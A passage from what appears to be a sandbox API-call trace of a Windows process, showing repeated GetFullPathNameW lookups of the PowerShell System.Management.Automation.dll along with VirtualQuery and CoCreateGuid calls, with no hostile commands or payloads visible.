lpFilePart=0x0) returned 0x74 [0050.502] GetLastError () returned 0x0 [0050.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.502] GetLastError () returned 0x0 [0050.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.502] GetLastError () returned 0x0 [0050.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.502] GetLastError () returned 0x0 [0050.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.502] GetLastError () returned 0x0 [0050.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.502] GetLastError () returned 0x0 [0050.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.502] GetLastError () returned 0x0 [0050.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.502] GetLastError () returned 0x0 [0050.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.502] GetLastError () returned 0x0 [0050.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.502] GetLastError () returned 0x0 [0050.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.503] GetLastError () returned 0x0 [0050.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.503] GetLastError () returned 0x0 [0050.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.503] GetLastError () returned 0x0 [0050.503] VirtualQuery (in: lpAddress=0x19d214, lpBuffer=0x19e214, dwLength=0x1c | out: lpBuffer=0x19e214*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dc08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.503] GetLastError () returned 0x0 [0050.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.503] GetLastError () returned 0x0 [0050.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.503] GetLastError () returned 0x0 [0050.503] VirtualQuery (in: lpAddress=0x19d214, lpBuffer=0x19e214, dwLength=0x1c | out: lpBuffer=0x19e214*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.503] GetLastError () returned 0x0 [0050.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.504] GetLastError () returned 0x0 [0050.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.504] GetLastError () returned 0x0 [0050.504] VirtualQuery (in: lpAddress=0x19ce44, lpBuffer=0x19de44, dwLength=0x1c | out: lpBuffer=0x19de44*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.504] VirtualQuery (in: lpAddress=0x19ce80, lpBuffer=0x19de80, dwLength=0x1c | out: lpBuffer=0x19de80*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.504] VirtualQuery (in: lpAddress=0x19d148, lpBuffer=0x19e148, dwLength=0x1c | out: lpBuffer=0x19e148*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.504] VirtualQuery (in: lpAddress=0x19d184, lpBuffer=0x19e184, dwLength=0x1c | out: lpBuffer=0x19e184*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.505] VirtualQuery (in: lpAddress=0x19d148, lpBuffer=0x19e148, dwLength=0x1c | out: lpBuffer=0x19e148*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.505] VirtualQuery (in: lpAddress=0x19d184, lpBuffer=0x19e184, dwLength=0x1c | out: lpBuffer=0x19e184*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.505] VirtualQuery (in: lpAddress=0x19d184, lpBuffer=0x19e184, dwLength=0x1c | out: lpBuffer=0x19e184*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.505] VirtualQuery (in: lpAddress=0x19d148, lpBuffer=0x19e148, dwLength=0x1c | out: lpBuffer=0x19e148*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.505] VirtualQuery (in: lpAddress=0x19d184, lpBuffer=0x19e184, dwLength=0x1c | out: lpBuffer=0x19e184*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.506] VirtualQuery (in: lpAddress=0x19d148, lpBuffer=0x19e148, dwLength=0x1c | out: lpBuffer=0x19e148*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.506] VirtualQuery (in: lpAddress=0x19d184, lpBuffer=0x19e184, dwLength=0x1c | out: lpBuffer=0x19e184*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.506] VirtualQuery (in: lpAddress=0x19d148, lpBuffer=0x19e148, dwLength=0x1c | out: lpBuffer=0x19e148*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.506] VirtualQuery (in: lpAddress=0x19d184, lpBuffer=0x19e184, dwLength=0x1c | out: lpBuffer=0x19e184*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.506] VirtualQuery (in: lpAddress=0x19cfec, lpBuffer=0x19dfec, dwLength=0x1c | out: lpBuffer=0x19dfec*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.507] VirtualQuery (in: lpAddress=0x19d148, lpBuffer=0x19e148, dwLength=0x1c | out: lpBuffer=0x19e148*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.507] VirtualQuery (in: lpAddress=0x19d184, lpBuffer=0x19e184, dwLength=0x1c | out: lpBuffer=0x19e184*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.507] VirtualQuery (in: lpAddress=0x19d148, lpBuffer=0x19e148, dwLength=0x1c | out: lpBuffer=0x19e148*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.507] VirtualQuery (in: lpAddress=0x19d184, lpBuffer=0x19e184, dwLength=0x1c | out: lpBuffer=0x19e184*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.507] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x6728f3f3, Data2=0x18a, Data3=0x48f2, Data4=([0]=0xb9, [1]=0xd1, [2]=0x4d, [3]=0xa7, [4]=0x4b, [5]=0xb9, [6]=0xbe, [7]=0xf8))) returned 0x0 [0050.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.508] GetLastError () returned 0x0 [0050.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.508] GetLastError () returned 0x0 [0050.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.508] GetLastError () returned 0x0 [0050.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.508] GetLastError () returned 0x0 [0050.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.508] GetLastError () returned 0x0 [0050.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.508] GetLastError () returned 0x0 [0050.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.508] GetLastError () returned 0x0 [0050.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.508] GetLastError () returned 0x0 [0050.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.508] GetLastError () returned 0x0 [0050.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.508] GetLastError () returned 0x0 [0050.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.509] GetLastError () returned 0x0 [0050.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.509] GetLastError () returned 0x0 [0050.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.509] GetLastError () returned 0x0 [0050.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.509] GetLastError () returned 0x0 [0050.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.509] GetLastError () returned 0x0 [0050.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.509] GetLastError () returned 0x0 [0050.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.509] GetLastError () returned 0x0 [0050.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.509] GetLastError () returned 0x0 [0050.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.509] GetLastError () returned 0x0 [0050.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.510] GetLastError () returned 0x0 [0050.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.510] GetLastError () returned 0x0 [0050.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.510] GetLastError () returned 0x0 [0050.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.510] GetLastError () returned 0x0 [0050.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.510] GetLastError () returned 0x0 [0050.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.510] GetLastError () returned 0x0 [0050.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.510] GetLastError () returned 0x0 [0050.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.510] GetLastError () returned 0x0 [0050.510] VirtualQuery (in: lpAddress=0x19ce44, lpBuffer=0x19de44, dwLength=0x1c | out: lpBuffer=0x19de44*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.511] VirtualQuery (in: lpAddress=0x19ce80, lpBuffer=0x19de80, dwLength=0x1c | out: lpBuffer=0x19de80*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dc34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.511] GetLastError () returned 0x0 [0050.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dbe4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.511] GetLastError () returned 0x0 [0050.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dbe4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.511] GetLastError () returned 0x0 [0050.511] VirtualQuery (in: lpAddress=0x19cf4c, lpBuffer=0x19df4c, dwLength=0x1c | out: lpBuffer=0x19df4c*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, 